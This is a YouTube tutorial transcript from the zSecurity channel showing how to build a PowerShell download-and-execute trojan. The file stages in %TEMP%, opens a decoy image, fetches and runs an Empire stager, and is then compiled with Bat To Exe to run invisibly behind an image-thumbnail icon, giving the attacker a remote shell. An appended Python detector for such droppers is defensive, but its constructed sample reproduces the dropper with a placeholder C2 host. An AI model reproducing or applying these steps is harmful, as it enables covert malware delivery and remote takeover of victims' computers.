How to Create Trojans Using Powershell

Captions
Hello everyone, Zaid from zSecurity here, and in today's video I'm going to show you how to easily and quickly create trojans. A trojan is a file that looks and behaves like a normal file, like an image or a PDF, but when executed it runs evil code in the background, like a backdoor or a keylogger. Therefore it's very, very useful in social engineering. Show some love by smashing that like button, subscribe to the channel if you haven't done so already, and let's go.

Before we jump into the video, I'd like to take a moment to thank our sponsor, DataCamp. DataCamp is like a one-stop shop for data science courses. It is a learning platform that is specially designed to teach you data science, from programming to machine learning to data engineering. You can pretty much start with no skills at all and become an expert in the field. They've got a really cool platform that makes the learning process fun and easy, so if you want to learn data science then make sure you check them out. Use the link in the description and you'll get free access to the first chapter of any course across the whole platform.

So the goal is to generate a trojan, and what we mean by a trojan is a file that opens up a normal file that the target person should be interested in. This can be an image, a PDF or anything you want, but at the same time, in the background, it executes code for a backdoor, a keylogger, a credential harvester or anything that is useful to you as a hacker. Let me show you a quick example. Right here I have two files, and as you can see both of them look like they are images. They are an image of the recent poster of the new Matrix movie; you should check it out, it looks very interesting. But one of them is an actual image and the other is a trojan. Let me show you the difference. If I just run an image, you can see we're just going to see the image. Now if I close this and run the trojan, which has the same icon and actually looks like an image, and I double-click it, I will also get the image. So the behaviour is identical to an actual real image, but at the same time running this file right here runs evil code in the background. It's code for a backdoor, for an Empire stager, and it sends a connection here to my Kali machine. So right now I can interact with this agent and I have remote control over that computer, and I can do anything I want on this Windows computer, this one right here. I can access its webcam, its file system, download and upload, and do anything that the normal user can do. And as you can see, we did this using a normal file that looks like a normal image, and like I said earlier you can do this with any file type, like a PDF or Word document or anything else.

Now the idea of hacking computers using trojans is not new. It has existed for very long and there are so many ways to do it. I covered it in my ethical hacking course, I covered more ways in my social engineering course, and I even covered how to manually code everything in my Python and hacking course, so check them out if you want to learn more about this and learn it in detail. But I'm going to teach you a quick way of doing that using PowerShell in this video.

So all you'll need to do this is one PowerShell command, or function, that allows us to download a file from a specified URL and save it on disk as the name that you specify in here. Now we're going to run this command twice: one time to download the actual image that we want the user to see, like the Matrix image in here, or the PDF or anything you want, and the second time we're going to be downloading the evil file, which could be a backdoor or a keylogger or anything else you want to run in the background. Very, very easy. Let's do it step by step just to make sure that everything is going to work the way we want it.

So let's test this functionality first of all. I'm going to go to my browser and find an image or a PDF that I want to display to the user, and you want to make sure that the link that you use is a direct URL, so you can access that resource directly; it won't view the resource inside the HTML page. So right here I have a direct link to that Matrix image. I'm simply going to copy it, go back to my Notepad, and we're just going to paste it in here as the URL, and finally we're going to store this, the out file, as, let's call it, matrix.png. So we're downloading a file from this URL and we're storing it on disk with the following file name. If we just copy this and open up a PowerShell prompt (we're just going to type powershell), right now we are in this specific path, so I'm actually just going to navigate to the desktop: I'm going to do cd Desktop to navigate to the desktop. You can see we are on the desktop now, and I'm just going to paste the command that I copied (I'm just going to right-click in here) and hit Enter to execute it. As you can see, it's downloading the file, we can already see it in here, and here we go: now we have the image downloaded on our desktop. So now we know that this function actually works as expected and we can use it to download a file from the specified URL and save it in the current working directory. That's very, very good.

So I'm going to delete this file, and all we have to do right now is use this command twice like I said: download the file that you want to display to the user first, open it, and then download the file that you want to run in the background and open it. So this is basically a download-and-execute payload. Then we're going to store everything in a .bat file. A .bat file is a file that contains a number of commands that get automatically executed when the user double-clicks it. Bat files can only run system commands, not PowerShell commands; therefore, because this is PowerShell and we executed it in the PowerShell prompt, we will have to actually type powershell before the command, and then we're going to say the PowerShell command that we want to run is this command, and we're going to enclose it in double quotes at the start and at the end. So basically all we're saying right here is that we want to execute the following command, the command that we just ran in the PowerShell prompt, as a PowerShell command, and we're doing this by specifying the -Command argument. Then we know that this command is going to download the file and it's actually going to store it on disk with the following name, matrix.png. So the next thing we'll want to do is actually run that file, execute it, so the user sees it on their screen. We're simply just going to type the file name, matrix.png, because that file is downloaded now on disk.

Next we're going to need to do the second step, which is download the file that we want to run in the background and execute it on the system. So you're going to need to create a backdoor. I'm not going to cover it in this video because it's going to become very long; I cover it on YouTube and in my courses in multiple places, and I even cover how to create and program your own backdoor in my Python course. So feel free to go to YouTube, Google, or watch my courses to create your evil file, or even if you want to create a keylogger. Like I said, I'm using a ready one; it's already hosted on my own Apache server on Windows. So I'm simply just going to copy its URL right here. It's an Empire stager, and we're simply going to paste its code in here. I'm first going to need to run the exact same command as we have in here, and we're going to replace the image URL this time with the link to the Empire stager, so I'm just going to need to get it again from here (copy link) and we're going to paste it in here. And obviously we don't want to store it as matrix.png; we're actually going to store it as a batch file as well, so we're just going to call it empire.bat. Now obviously you can use different names. This file being a bat file, we could actually embed all of the code in here within it, but I'm just trying to show you a generic way that you can use with multiple scenarios. So now this link is going to download the backdoor for us, or the stager or the evil file, and the next step is going to be to execute that file, again exactly like we did in here: we downloaded matrix.png from this URL and then we ran it, and then we download the backdoor in this line, we're saving it as empire.bat, and we're going to run it by simply typing empire.bat. And that's it, we're ready.

The only thing is, once this is executed, as we've seen when we executed this PowerShell command, the image was downloaded in the working directory, on the desktop. Therefore, if the target downloads this into their Downloads and runs the trojan, they will actually see the image file being downloaded and the backdoor being downloaded to that working directory, so they will see new files being displayed in their folder in here, and therefore that will be suspicious. So what we're going to do, before doing anything, is actually change our working directory, exactly the same way that we did in here when we did cd Desktop. But instead of going to the desktop, which is a place that the user sees a lot, we're actually going to go to the temp directory, so we're going to do cd %temp%. We're using the percentage signs in here to tell the operating system to navigate to the temp path regardless of where that temp path is; we're using the TEMP environment variable. And that's it, we're actually ready to go. We're going to first of all go to the temp directory, download an image or any file that you want to display to the user, open the file, download an evil file, open it, and again you can do this multiple times if you want to open a number of evil files or a number of things, so this can be used in so many scenarios.

So once you're done, we're going to save this, and you just want to make sure that you set the type to All Files and set the extension to a batch file. Use whatever name you want; let's say matrix trojan this time, and we're just going to call it .bat. Now obviously you don't want to tell the user that this is a trojan; we're just doing this in the video. And that's it, we're done. Let's select a place to save it; let's save it on my desktop, that's fine, and I'm going to save it there. And that's it, we're ready. Let's go ahead and execute it. So we're going to minimise this, close this, minimise and close, and I'm just going to go to my Kali machine and actually kill my connection at the moment. So we're just going to go back and we're going to do kill all so that I don't have any connections. If we list, you'll see we've got nothing right now. And let's just go ahead and run this, and perfect, as you can see it's downloading the image first and then it's running it. Now obviously, preferably you'd want to use a file that is not that big so it's downloaded and executed quickly, but as you can see we can see the image, and we don't see any strange files in here because we stored everything in the temp directory. And if our evil code got executed in the background, I should have got an agent in here, and sure enough, as you can see, I get a connection through my Empire. So now I can remotely control that Windows machine from here.

Now I know what you're thinking: this file right here looks very, very suspicious. It doesn't look like the trojan that I showed you at the start of the video. Not only that, but if you right-click this file and open it in a text editor you will actually see the code inside it, which is not very good; the user is going to know that you're trying to do something suspicious. Therefore, what you want to do at the end, once you've tested it like this as a bat file, is compile it to an executable, similar to what we have in here, and then give it an icon and also run it in the background, because when we executed this we had a terminal window that we saw, which is also very, very suspicious. So to address all of these issues, all you have to do is compile it to an executable. You can use a program like Bat To Exe; I will include its link in the resources. All you have to do is simply run the program, open the bat file that you just created, or you can simply just drag and drop it in here. You can already see the code, and all we want to do is tick the icon in here and select the icon that you want to use. Now if this was a PDF you could simply just download a generic PDF icon, or a generic image icon, but as you can see in Windows, if the file is an image you will actually see a thumbnail of the image, similar to what we have in here. Therefore we're going to have to manually create an icon that looks like this image. To do that we're going to use an online service; again, there are a lot of these, and simply you're just going to have to upload it. We have the image in our Downloads, and this is it. We're going to click on Convert and download it, we're going to save it, it's going to go into my Downloads, so if I just look at it here very quickly you can see the icon in here.

So we're going to go back to our Bat To Exe. We already ticked the icon; we're going to select the icon that we want, which is in my Downloads, double-click it, and we're also going to change the exe format. We're going to keep it at 32-bit, but we're going to select the Invisible option, which will basically run the executable in the background without showing a terminal window, so that it is less suspicious. You can even ask it for UAC, and if you do then the backdoor is going to run as admin, but we don't want to do that at this stage. So I'm just going to click on Convert in here to convert it to an executable for me, and again we're just going to store this on the desktop, and this time let's call it matrix poster. Save. Everything is fine. Let's minimise and look at the file, and perfect, as you can see the file looks perfect: it looks like an actual image with the thumbnail. And before I run it I'm going to kill my connection, so again we're going to do kill all, y, list to make sure we've got nothing. We have nothing. And let's execute the file. As you can see we did not see a terminal window, so everything got executed in the background. Again we can see the image in here; the icon looks not suspicious at all. But if we go to our Kali machine we can see that we got a new connection, so we can interact with this agent and we can do cmd, sorry, I mean shell, to get a shell on that target system. We can do pwd to see our working directory, do dir to see where we are, and from here, like I said, you have remote control over that computer and you can do anything you want. And like I said earlier, you don't have to always use an Empire stager; you can use any file, and you can display any file to the user as well. All you have to do is just simply download the files you want and execute them like so.

That's a quick and dirty way of doing this. Check out my courses, or research, Google, if you want to learn more, and don't forget to subscribe to the channel and hit the bell to be updated every time we release a new video.
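The dropper the video builds has a fixed shape: change into %TEMP%, fetch a decoy with a PowerShell download one-liner, open it, fetch a second file, run it. That shape is also what a defender looks for when a .bat attachment or a captured command line lands on their desk. The following is an added example written for this page, not code from the video or from zSecurity: a small static check that pairs every file a batch script downloads with a later line that launches it. The sample batch text inside it is constructed to mirror the transcript; the hosts, URLs and file names are placeholders, not real indicators, and `Invoke-WebRequest -OutFile` is assumed as the download cmdlet, since the video only describes "a PowerShell command that downloads a file from a URL and saves it under the name you specify".

```python
"""Static check for the download-and-execute .bat dropper described above.

Added example, not the video's or zSecurity's code. SAMPLE_BAT is constructed
to mirror the transcript; its hosts, URLs and file names are placeholders.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the shape the transcript describes (placeholder URLs).
SAMPLE_BAT = r"""@echo off
cd %temp%
powershell -Command "Invoke-WebRequest -Uri http://decoy.example/matrix.png -OutFile matrix.png"
matrix.png
powershell -Command "Invoke-WebRequest -Uri http://c2.example/empire.bat -OutFile empire.bat"
empire.bat
"""

# PowerShell download primitives that write to disk, plus the flag naming the file.
DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|wget|curl)\b"
    r".*?(?:-OutFile|-Destination)\s+['\"]?(?P<out>[^\s'\"]+)",
    re.IGNORECASE,
)
# (New-Object Net.WebClient).DownloadFile(url, path) form.
WEBCLIENT_RE = re.compile(
    r"DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<out>[^'\"]+)['\"]\s*\)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Staging into a directory the user rarely opens, exactly as the video does.
CD_TEMP_RE = re.compile(r"^\s*(?:cd|pushd)\s+(?:/d\s+)?['\"]?%(?:temp|tmp)%", re.IGNORECASE)
# Launch prefixes batch authors use: start "" file, call file, .\file
EXEC_PREFIX_RE = re.compile(r'^(?:@?(?:start|call)\s+(?:""\s+)?|\.\\)', re.IGNORECASE)
SKIP_PREFIXES = ("rem ", "::", "@echo", "echo ", "cd ", "pushd ", "set ", "exit", "del ", "timeout ")


@dataclass
class Finding:
    download_line: int
    exec_line: int
    filename: str
    url: Optional[str]


@dataclass
class Report:
    stages_in_temp: bool = False
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A file fetched from the network and then launched by the same script.
        return bool(self.findings)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1].strip("'\"").lower()


def _download_target(line: str):
    """Return (saved file basename, url) if the line downloads a file, else (None, None)."""
    m = WEBCLIENT_RE.search(line)
    if m:
        return _basename(m.group("out")), m.group("url")
    m = DOWNLOAD_RE.search(line)
    if m:
        url = URL_RE.search(line)
        return _basename(m.group("out")), url.group(0) if url else None
    return None, None


def _exec_target(line: str) -> Optional[str]:
    """Return the basename a batch line would launch, or None for non-launch lines."""
    s = line.strip()
    if not s or s.lower().startswith(SKIP_PREFIXES):
        return None
    parts = EXEC_PREFIX_RE.sub("", s).split()
    return _basename(parts[0]) if parts else None


def analyse_bat(text: str) -> Report:
    """Pair each downloaded file with a later line that launches it."""
    report = Report()
    downloads = {}  # basename -> (line number, url)
    for no, line in enumerate(text.splitlines(), start=1):
        if CD_TEMP_RE.search(line):
            report.stages_in_temp = True
        out, url = _download_target(line)
        if out:
            downloads[out] = (no, url)
            continue
        target = _exec_target(line)
        if target in downloads:
            dl_no, dl_url = downloads[target]
            report.findings.append(Finding(dl_no, no, target, dl_url))
    return report


if __name__ == "__main__":
    rep = analyse_bat(SAMPLE_BAT)
    print(f"stages in %TEMP%: {rep.stages_in_temp}")
    for f in rep.findings:
        print(f"line {f.download_line} fetches {f.filename} from {f.url}; line {f.exec_line} runs it")
```

Run against the constructed sample, it reports the decoy (matrix.png) and the second-stage file (empire.bat) as two download-then-launch pairs and flags the %TEMP% staging. The same pairing logic applies to the `Net.WebClient.DownloadFile` form, which is why it is matched separately: the pattern that matters is "fetched from the network, then executed by the same script", not any one cmdlet name. Once the video compiles the .bat into an .exe with Bat To Exe, this file-level check no longer sees the script, so on a host the equivalent signal is a process tree in which a freshly written executable spawns powershell.exe with a download command line.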
Info
Channel: zSecurity
Views: 129,484
Rating: 4.9030271 out of 5
Keywords: trojans, ethical hacking, hacking, metasploit, powershell-empire, kali, hack with image, backdoor image, backdoor, cyber security, zSecurity, powershell, bat, batch file, download and execute
Id: eiT7mslA63c
Length: 15min 53sec (953 seconds)
Published: Thu Sep 16 2021